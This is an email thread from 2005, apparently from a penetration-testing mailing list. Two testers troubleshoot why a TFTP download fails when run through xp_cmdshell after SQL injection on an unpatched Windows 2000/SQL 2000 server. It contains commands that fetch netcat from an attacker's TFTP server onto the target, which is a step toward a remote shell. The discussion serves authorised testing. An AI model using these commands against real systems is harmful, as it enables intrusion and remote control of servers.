From: Jose Selvi <jselvi@s2grupo.com>
To: Andres Molinetti <andymolinetti@hotmail.com>
CC: pen-test@securityfocus.com
Subject: Re: TFTP and XP_CMDSHELL - Weird
Date: Thu, 23 Jun 2005 09:16:41 +0200
Maybe sqlsvc user can't write in c:\ folder. Can He?.
The first call to tftp you are using Administrator user, who of course can
write in c:\ .
Try "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\winnt\temp\nc.exe".
It must work.
It doesn't.
Besides, I have done "runas /user:sqlsvc echo a > c:\xx.exe" and the file is
created.
any ideas?
If it is any useful I recieve the following error on the Target machine:
"tftp: No se puede escribir en el archivo local 'c:\xx.exe'"
(tftp: Not able to write in local file 'c:\xx.exe')
In a tcpdump in my TFTP Server I get the following error:
10:41:37.528994 IP TARGET.1942 > SERVER.tftp: 48 ERROR EACCESS no se puede
abrir el archivo para escritura"
(cannot open file for writing)
I think its beyond xp_cmdshell now..
Thanks, Andy
Andres Molinetti escribió:
Hi, I am testing a Web App vulnerable to SQL Injection.
It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
While trying to use the xp_cmdshell to upload nc.exe from my tftpd server
to the Webserver, I experienced some problems.
I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost GET
nc.exe c:\nc.exe". File is downloaded.
When I tried it through the wep app it failed. I tried directly through
SQL Query Analizer and it also failed.
SQL is running as a low priviledged account (sqlsvc)...
Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET
nc.exe c:\nc.exe" and IT FAILED.!!
I can easily deduce that the problem is the TFTP client (tftp.exe)...
Any Ideas?
_________________________________________________________________
Descarga gratis la Barra de Herramientas de MSN
http://www.msn.es/usuario/busqueda/barra?XAPID=2031&DI=1055&SU=http%3A//www.hotmail.com&HL=LINKTAG1OPENINGTEXT_MSNBH
